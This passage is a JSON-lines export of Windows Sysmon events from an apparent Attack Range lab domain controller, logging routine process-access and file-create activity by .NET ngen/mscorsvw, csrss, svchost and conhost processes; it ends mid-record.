{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-049B-5F25-0000-0010D56D0F00}\r\nTargetProcessId: 4268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-049B-5F25-0000-0010D56D0F00}","TargetProcessId":"4268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:52.496\r\nProcessGuid: {A837DB8D-0499-5F25-0000-001044650F00}\r\nProcessId: 2504\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9c8-0\\ReachFramework.dll\r\nCreationUtcTime: 2020-08-01 05:58:52.496","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:52.496","ProcessGuid":"{A837DB8D-0499-5F25-0000-001044650F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9c8-0\\ReachFramework.dll","CreationUtcTime":"2020-08-01 05:58:52.496","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.574\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001079700F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.574","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001079700F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.574\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001079700F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.574","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001079700F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001079700F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001079700F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00101B740F00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00101B740F00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00101B740F00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00101B740F00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00101B740F00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00101B740F00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.668\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001091770F00}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 